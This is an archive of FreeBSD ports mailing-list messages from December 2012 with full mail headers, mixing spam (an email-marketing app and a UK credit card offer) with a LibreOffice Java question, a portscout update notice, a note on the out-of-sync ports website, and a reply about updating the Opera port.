Yt72XGXhdmWOf3hpOZHhOapiorCWS9K.l1qIcaf_wBmBikohMBQIwm.XLAPi On7GykmDe11VrZoxNymRkCB83XKJDwa0rMK0Aj7kiNKq0zIKpUPRZgSmkGxv 3X1uo7dbwgdBrv2olcZbcGyhasBJMw8tr404UDP6u7SqRUhdL.8DWZbAf0ww Ei5UcwTMh5IKgymWBZxfltaKz16OEq.yIKDRE2O9_a7W.BN.aDT1gRtn8lgH EmA1CaQZXW_nbC3MjadJ1csjtCsn_wVWjsYDV1DvPDf.EEHmPcrmlk2w1lZl 3Ml34ZdjJeyQDGTFG.s7yo8ZqNDcSfo7M1omfsf3eHut0hBFSo_www9cYJNy RzEN6vS_Bs3byShZmcLExtmB61HkpgEY- X-Yahoo-SMTP: jvo5dZiswBBPVHKcU047XYyrAasfDFo- Received: from localhost (boostemail@58.186.5.36 with login) by smtp126.mail.ukl.yahoo.com with SMTP; 01 Dec 2012 11:51:47 +0000 GMT Date: Sat, 1 Dec 2012 18:52:01 +0700 (GMT+07:00) From: Email Marketing Booster To: ports@freebsd.org Message-ID: <1107574936.63.1354362721460.JavaMail.javamailuser@localhost> Subject: Email Marketing Booster for mobile and tablet MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_62_1107991136.1354362721441" X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: boostemail@yahoo.co.uk List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 11:54:04 -0000 ------=_Part_62_1107991136.1354362721441 MIME-Version: 1.0 Content-Type: text/plain; charset="utf-8" Hello ports@freebsd.org, I have developed an email marketing tool for android mobile and tablet. It is available for download at: * Google play: [1]https://play.google.com/store/apps/details?id=com.emailboosterpr o * Amazon Store: [2]http://www.amazon.com/gp/product/B0097B4MJI With: - The professional email composer (WYSIWYG editor) . - The powerful email sender (multi-connection sender). - Many beautiful email templates (over 120 templates) ... My app is the only one and the best one in android world for email marketing. If you want to advertise your products, your applications or building your customer relationship... you must use it. Best regards, Email Marketing Booster P/s: [3]email me if you want to unsubscribe your email from my booster list. References 1. https://play.google.com/store/apps/details?id=com.emailboosterpro 2. http://www.amazon.com/gp/product/B0097B4MJI 3. mailto:emailmbooster@gmail.com?Subject=Unsubscribe ------=_Part_62_1107991136.1354362721441-- From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 14:15:14 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 241BAF57 for ; Sat, 1 Dec 2012 14:15:14 +0000 (UTC) (envelope-from levitch@iglou.com) Received: from rdsmtp.iglou.com (rdsmtp.iglou.com [192.107.41.63]) by mx1.freebsd.org (Postfix) with ESMTP id CDE218FC12 for ; Sat, 1 Dec 2012 14:15:13 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=iglou.com; s=alpha; h=Content-Type:MIME-Version:Message-ID:Subject:To:From:Date; bh=A/6tLME6APkmnOuyFbGY6nLzOSOz3uMrqj5X5Lz2NFE=; b=aQeAPmStcCE/ZeUeZo1ZsU63krDaqS7Ev/vb32c/JotDlxcKmrSwJjHJ0VOBWht/GKm9J+HWUj1/4GrtAjQtF5jIAIy45Zf+NthW8KjQW62GVVKStwoKb29+hAc+b0fucgpsYbQpYPJ3GhSAw9IJwWTQ2RhrLHnfH6cR2J4dUuk=; Received: from iglou1.iglou.com ([192.107.41.3]:42941 helo=mail.iglou.com) by rdsmtp.iglou.com with esmtpa (Exim MTA/8.19.3) (envelope-from ) id 1TenX0-0000Bc-8c by authid with igloumta_auth for freebsd-ports@freebsd.org; Sat, 01 Dec 2012 08:54:58 -0500 Received: from shell1.iglou.com ([192.107.41.17]:45462 helo=shell1) by mail.iglou.com with esmtps (TLS cipher TLSv1:AES256-SHA:256) (Exim MTA/8.19.3) (envelope-from ) id 1TenWz-0003Hh-Rl for freebsd-ports@freebsd.org; Sat, 01 Dec 2012 08:54:57 -0500 Date: Sat, 1 Dec 2012 08:54:57 -0500 (EST) From: Darrel X-X-Sender: levitch@shell1 To: freebsd-ports@freebsd.org Subject: LibreOffice 3.5.7.2 | tools > options > java Message-ID: User-Agent: Alpine 2.00 (GSO 1167 2008-08-23) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; format=flowed; charset=US-ASCII X-Originating-IP: 192.107.41.17 X-IgLou-Customer: 3cb6f76205bd20f518810676a67a982b X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 14:15:14 -0000 Hello, I put java7 on fbsd91 and guess that libreoffice installed java6: (589) @ 8:47:05> pkg info | grep jdk openjdk-7.9.05_1 Java Development Kit 7 openjdk6-b27 Oracle's Java 6 virtual machine release At the menu Tools > Options > Java, does someone have a good idea how 'Add', 'Parameters', and 'Class Path' should be populated? Darrel From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 14:43:22 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 3053E1B7 for ; Sat, 1 Dec 2012 14:43:22 +0000 (UTC) (envelope-from portscout@portscout.freebsd.org) Received: from null.zi0r.com (null.zi0r.com [71.245.171.204]) by mx1.freebsd.org (Postfix) with ESMTP id DD58F8FC1A for ; Sat, 1 Dec 2012 14:43:21 +0000 (UTC) Received: from null.zi0r.com (localhost [127.0.0.1]) by null.zi0r.com (8.14.5/8.14.5) with ESMTP id qB1EhLoM090559 for ; Sat, 1 Dec 2012 09:43:21 -0500 (EST) (envelope-from portscout@portscout.freebsd.org) Received: (from portscout@localhost) by null.zi0r.com (8.14.5/8.14.5/Submit) id qB1EhLT6090282; Sat, 1 Dec 2012 09:43:21 -0500 (EST) (envelope-from portscout) Message-Id: <201212011443.qB1EhLT6090282@null.zi0r.com> MIME-Version: 1.0 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain Date: Sat, 1 Dec 2012 09:43:21 -0500 From: portscout@portscout.freebsd.org To: ports@freebsd.org Subject: FreeBSD ports you maintain which are out of date X-Mailer: portscout/0.8.1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 14:43:22 -0000 Dear port maintainer, The portscout new distfile checker has detected that one or more of your ports appears to be out of date. Please take the opportunity to check each of the ports listed below, and if possible and appropriate, submit/commit an update. If any ports have already been updated, you can safely ignore the entry. You will not be e-mailed again for any of the port/version combinations below. Full details can be found at the following URL: http://portscout.freebsd.org/ports@freebsd.org.html Port | Current version | New version ------------------------------------------------+-----------------+------------ games/freecell-solver | 3.12.0 | 3.16.0 ------------------------------------------------+-----------------+------------ If any of the above results are invalid, please check the following page for details on how to improve portscout's detection and selection of distfiles on a per-port basis: http://portscout.freebsd.org/info/portscout-portconfig.txt If wish to stop receiving portscout reminders, please contact portscout@portscout.freebsd.org Thanks. From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 16:47:04 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D4D316B4 for ; Sat, 1 Dec 2012 16:47:04 +0000 (UTC) (envelope-from 000.fbsd@quip.cz) Received: from elsa.codelab.cz (elsa.codelab.cz [94.124.105.4]) by mx1.freebsd.org (Postfix) with ESMTP id 8ACD48FC08 for ; Sat, 1 Dec 2012 16:47:04 +0000 (UTC) Received: from elsa.codelab.cz (localhost [127.0.0.1]) by elsa.codelab.cz (Postfix) with ESMTP id E89B228427 for ; Sat, 1 Dec 2012 17:46:56 +0100 (CET) Received: from [192.168.1.2] (unknown [89.177.49.69]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by elsa.codelab.cz (Postfix) with ESMTPSA id 4FCE228422 for ; Sat, 1 Dec 2012 17:46:54 +0100 (CET) Message-ID: <50BA347D.9080301@quip.cz> Date: Sat, 01 Dec 2012 17:46:53 +0100 From: Miroslav Lachman <000.fbsd@quip.cz> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.1.19) Gecko/20110420 Lightning/1.0b1 SeaMonkey/2.0.14 MIME-Version: 1.0 To: freebsd-ports@freebsd.org Subject: web FreeBSD Ports Search is out of sync Content-Type: text/plain; charset=ISO-8859-2; format=flowed Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 16:47:04 -0000 Hi, I don't know the details about infrastructure, but I found out that web is showing lighttpd-1.4.31_5 [1] and svn ports tree has 1.4.32 for a 10 days [2] Is it aftermath of the intrusion to the FreeBSD.org cluster? [1] http://www.freebsd.org/cgi/ports.cgi?query=^lighttpd-1 [2] http://svnweb.freebsd.org/ports/head/www/lighttpd/?view=log Miroslav Lachman From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 18:17:39 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 627275F9 for ; Sat, 1 Dec 2012 18:17:39 +0000 (UTC) (envelope-from news@fasanonetwork.co.uk) Received: from moutng.kundenserver.de (moutng.kundenserver.de [212.227.126.187]) by mx1.freebsd.org (Postfix) with ESMTP id 013288FC08 for ; Sat, 1 Dec 2012 18:17:38 +0000 (UTC) Received: from host86-169-110-107.range86-169.btcentralplus.com (host86-169-110-107.range86-169.btcentralplus.com [86.169.110.107]) by mrelayeu.kundenserver.de (node=mreu4) with ESMTP (Nemesis) id 0LoNh8-1SyfGN3eXK-00gLiF; Sat, 01 Dec 2012 19:17:38 +0100 From: "3% Cashback on All purchases" Subject: aqua Reward offers the best of both: Credit builder & 3% Cashback on all purchases To: "ports" MIME-Version: 1.0 Organization: 3% Cashback on All purchases Date: Sat, 1 Dec 2012 18:17:46 +0000 Message-Id: <0LoNh8-1SyfGN3eXK-00gLiF@mrelayeu.kundenserver.de> X-Provags-ID: V02:K0:KRlRVRFjDn8eRrMh0pymE56QpFUydNDNUnfOYbP32f6 o0F0D4t34aeFwIHEYvXwc8I15cSrUyPVeq1elGiA9rDgbt1gL5 gkh9CsOUhc1lZwSCG+VyVqZnww49NbHcfZZPNjp/pOBdOry80g A2ZmWBwi64ucv4hp905qX5JpxoR5wrhuMhUJfbvH8Qgce5CnEa BSYZhac8IEK+5IM3teqgO1NRZntY+F+OnXJKb59BfQkDC3VjI4 SMdxsxsxh6ciZVXiPpZQ5SxA6Lui/dpjC4G2L7/S/gmHsV5jke OR1HpfwDXVznVOctUH29s8nKs/1AelIbXhPTIc1Dm6PPbTx9mz RWwkRy8fzoNvl4IozIr6mPrVO11/YxAjaMQCRUNkYXNCkrr7WU b9OI7+QdsnRqajSJOGOQhxyXzUUW9xFB8oBPiecjXeFNfaIhZg Q5TRdV0MZvC8w7B+YJYhylQzlNw== Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable Content-Disposition: inline X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 18:17:39 -0000 =EF=BB=BFaqua - we accept someone every 4 minutes=20 Dear prospective customer, Our mission is to help customers who need access to credit. Whether it= =E2=80=99s to start improving your credit rating or to be available in= the event of an emergency, an aqua card could be yours even if you ha= ve been rejected for a credit card by another provider or have a Count= y Court Judgement (CCJ) against you. It=E2=80=99s worth applying =E2=80= =93 we=E2=80=99ve already helped over 300,000 people. And don=E2=80=99t worry, as a responsible lender we won=E2=80=99t lend= you more than we think you can repay. =E2=80=A2 3% cash back up to =C2= =A3100 every year =E2=80=A2 0% fee on non=E2=80=93sterling spend, making it free to use = your card abroad =E2=80=A2 A MasterCard with no annual fee =E2=80=A2 Initial credit limit of =C2=A3250=E2=80=93=C2=A31,600 and a = possible increase after 4 months =E2=80=A2 You choose your monthly repayment date =E2=80=A2 Text reminders to help you stay in control =E2=80=A2 UK=E2=80=93based customer service agents who are happy to he= lp=20 aqua is a trademark of SAV Credit Limited, which is used under licence= by Progressive Credit Limited. aqua credit cards are issued by Progre= ssive Credit Limited. Registered in England and Wales No. 7297722. Reg= istered Office: First Floor, 11 Tower View, Kings Hill, West Malling, = Kent ME19 4RL. Authorised in the United Kingdom by the Financial Servi= ces Authority under the Payment Services Regulations 2009 (reference n= umber 555318) for the provision of payment services.=20 contact us | about us | privacy policy | cookies policy=20 This email was sent to Vanquis@creditcardchoices.org.uk You may unsubs= cribe from this list. *Terms and conditions apply. Interest rates and credit limits will var= y depending on your individual circumstances.=20 =20 From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 21:48:43 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 032B68D9 for ; Sat, 1 Dec 2012 21:48:42 +0000 (UTC) (envelope-from jakub_lach@mailplus.pl) Received: from sam.nabble.com (sam.nabble.com [216.139.236.26]) by mx1.freebsd.org (Postfix) with ESMTP id BFE1B8FC0C for ; Sat, 1 Dec 2012 21:48:42 +0000 (UTC) Received: from [192.168.236.26] (helo=sam.nabble.com) by sam.nabble.com with esmtp (Exim 4.72) (envelope-from ) id 1TeuvM-0007Cm-MW for freebsd-ports@freebsd.org; Sat, 01 Dec 2012 13:48:36 -0800 Date: Sat, 1 Dec 2012 13:48:36 -0800 (PST) From: Jakub Lach To: freebsd-ports@freebsd.org Message-ID: <1354398516576-5765785.post@n5.nabble.com> In-Reply-To: <20121124225507.GD12528@portland1.byshenk.net> References: <20121123092631.3b0aff2f0902e02098c273b4@alkumuna.eu> <50AF3B4B.9030704@freebsd.org> <20121123143735.90c91a7d81dc73c39764bcd8@alkumuna.eu> <20121124225507.GD12528@portland1.byshenk.net> Subject: Re: Opera vulnerability, marked forbidden instead of update? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 21:48:43 -0000 About updating opera port, it's matter of updating plist to make sure that opera cleans up after deinstall properly. Opera have a habit of silently adding new files between versions, so it's must be checked. Speaking from user perspective, you don't even need to bump version in Makefile, nobody stops you from downloading from opera.com directly and using their installer as well as their uninstaller (they provide both). It works, and should always work, as long FreeBSD is supported platform. Just when something is in ports, it must be integrated into infrastructure fully. -- View this message in context: http://freebsd.1045724.n5.nabble.com/Opera-vulnerability-marked-forbidden-instead-of-update-tp5763426p5765785.html Sent from the freebsd-ports mailing list archive at Nabble.com.